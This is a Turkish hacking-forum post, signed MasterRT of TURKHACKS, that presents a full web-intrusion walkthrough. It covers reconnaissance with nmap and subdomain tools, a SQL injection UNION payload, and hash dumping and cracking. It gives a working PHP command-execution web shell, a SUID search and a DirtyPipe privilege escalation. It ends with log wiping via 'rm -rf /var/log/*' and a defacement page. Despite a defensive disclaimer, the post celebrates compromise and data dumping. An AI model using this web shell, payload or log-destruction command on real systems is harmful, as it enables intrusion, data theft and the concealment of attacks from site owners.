OPERASYONEL ANALİZ: WEB PENETRASYON METODOLOJİSİ
"Sistemler uyur, ancak açıklar asla."
Merhaba değerli TURKHACKS ailesi. Ben MasterRT. Bugün, bir siber güvenlik uzmanının veya ileri düzey bir saldırganın, hedef bir altyapıyı nasıl analiz ettiğini, zafiyetleri nasıl manipüle ettiğini ve sistemin kalbine (Root) nasıl ulaştığını adım adım bir senaryo üzerinden teknik detaylarıyla ele alacağız.
DİKKAT: Bu dokümantasyon tamamen defansif siber güvenlik farkındalığı oluşturmak amacıyla hazırlanmıştır. Bilgi, doğru ellerde güç; yanlış ellerde ise sadece yıkımdır.
1. BÖLÜM: PASİF VE AKTİF BİLGİ TOPLAMA (INFO GATHERING)
Saldırı vektörünü belirlemeden önce hedefi dijital bir röntgenden geçiriyoruz.
[]Subdomain Discovery:SubfinderveAssetfinderile ana domainin arkasında unutulmuş test sunucuları (https://www.google.com/search?q=staging.target.com) aranır.
[]Service Fingerprinting:nmap -sV -sC -Pn <target>komutuyla çalışan servislerin versiyonları tespit edilir.- Tech Stack Analysis: Hedefin backend mimarisi (PHP/Node.js), veritabanı tipi (PostgreSQL/MySQL) ve WAF (Cloudflare/Sucuri) durumu analiz edilir.
2. BÖLÜM: ZAFİYET VEKTÖRÜNÜN TESPİTİ
Yapılan taramalar sonucunda, hedef sitenin kullanıcı profil kısmında bir Stored XSS ve eklenti parametrelerinde Blind SQL Injection şüphesi doğuyor.
[]Payload:' UNION SELECT 1,2,3,database(),user() -- -
[]Analiz: SQLmap ile veritabanı tabloları dump edilerek admin hashleri (MD5/BCrypt) çekilir. Hashler offline olarak Hashcat veya John The Ripper ile kırılır.
3. BÖLÜM: SİSTEME INTRUSION VE WEB SHELL
Admin paneline erişim sağlandıktan sonra, "Plugin Editor" veya "Media Upload" kısımlarından sunucuya RCE (Remote Code Execution) tetikleyecek bir payload gönderilir.
PHP:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?>
Bu aşamada Hacker artık sistemin içindedir.
whoami komutuyla yetki kontrol edilir: www-data.4. BÖLÜM: PRIVILEGE ESCALATION (YETKİ YÜKSELTME)
Sunucuda tam hakimiyet kurmak için Local Privilege Escalation teknikleri uygulanır:
[]SUID Bit Taraması:find / -perm -u=s -type f 2>/dev/nullile root yetkisiyle çalışan dosyalar bulunur.
[]Kernel Exploit: Linux çekirdeğindeki (DirtyPipe, CVE-2022-0847 vb.) açıklar üzerinden #root yetkisi alınır.
5. SONUÇ: FLAG VE INDEX
Yetki yükseltildikten sonra loglar temizlenir (
rm -rf /var/log/*) ve sistemin kalbine, adaletin sesini duyuran o meşhur index dosyası bırakılır.MISSION ACCOMPLISHED
| Penetrasyon Lideri | MasterRT |
| Hedef Altyapı | Compromised |
| Veri Sızıntısı | %100 Dumped |
MasterRT | TURKHACKS
"Biz sessizce derinlerde gezeriz, vaktimiz geldiğinde ise sadece enkazımızı bırakırız."
Son düzenleme:






